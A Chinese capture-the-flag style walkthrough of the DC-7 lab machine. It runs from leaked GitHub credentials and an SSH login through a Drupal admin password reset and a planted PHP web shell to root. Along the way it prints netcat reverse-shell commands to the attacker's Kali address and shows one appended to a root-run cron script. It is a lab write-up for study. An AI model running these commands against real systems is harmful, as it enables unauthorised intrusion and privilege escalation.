攻击机kali:192.168.56.108
靶机dc7:192.168.56.109
首先要保证两台机子在同一网段上,设置dc7网络为仅主机网络,kali的为桥接模式。
设置完成之后就可以开始了。
扫描存活主机
扫描靶机开放的端口
可以看到开放了80端口(http服务)和22端口 (ssh服务),打开浏览器进行访问
提示说使用暴力和字典攻击都没办法成功和跳出框思考,我们再通过wappalyzer得知cms是drupal8
根据页面的提示,我们拿dc1的页面和dc7的页面进行对比一下,发现dc7页面左下角多了个@dc7user
尝试使用搜索引擎进行搜索
发现在github上有关于这个的信息,点进去之后发现staffdb
再点进去会发现有很多个代码文件
点开敏感字眼的文件名进行查看,在config.php中看到有登录的用户名和密码
想到最开始扫描端口的时候,它是开启了22端口的,利用ssh尝试进行登录
成功登录到dc7user。发现/home/dc7user目录下有个文件夹和一个文件,进入到文件夹中发现又是两个gpg后缀的文件,
百度了解到gpg格式的是加密文件 ,且加密后文件内容都是乱码。这应该对我们就是没什么用的了,那就先查看mbox文件的内容。
发现是个任务执行计划,发现root用户执行了backups.sh脚本,打开backups.sh文件发现里面有个drush命令
查找资料了解到drush命令是drupal框架用来做一些配置的命令,可以用来修改用户名和密码
drush user-password admin --password="123456"
没修该成功。。。发现有一封新的mail,打开看了一下也是没有用的信息。后来了解到因为修改密码是为了能够在网站中进行登录,所以要到/var/www/html目录下进行修改密码
发现已经修改成功了,修改成功之后在登录页面进行登录
然后在content下看到有个add content,点进去再进入basic page,
猜测在这里可以写入一句话木马来拿到shell,但此时发现drupal8不支持php代码,但我们发现该页面中有个extend扩展模块,应该是可以导入php模块的, extend下点击install new module
然后根据提示写入php的安装脚本页面
安装完成之后激活这个模块,激活之后选中点击install
安装成功之后回到basic page写入一句话木马
接着用蚁剑进行连接
连接成功之后进行反弹shell的操作,打开蚁剑虚拟终端
kali终端中监听9999端口
nc -lvvp 9999然后在蚁剑虚拟终端输入
nc -e /bin/bash 192.168.56.108 9999
成功反弹信息,接着获取交互式的shell
python -c 'import pty;pty.spawn("/bin/bash")'
我们的最终目的是要拿到管理员的shell,而www-data用户就可以编辑backups.sh文件,所以我们此时就是要向backups.sh中写入反弹shell的命令。
echo "nc -e /bin/bash 192.168.56.108 4444" >>backups.sh
此时我们再打开一个终端,并监听4444端口,然后等待它这个计划任务的脚本执行来反弹一个管理员权限的shell ,等待的时间有点长,反弹成功之后就拿到root权限从而得到flag
dc-7结束~~
3838
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
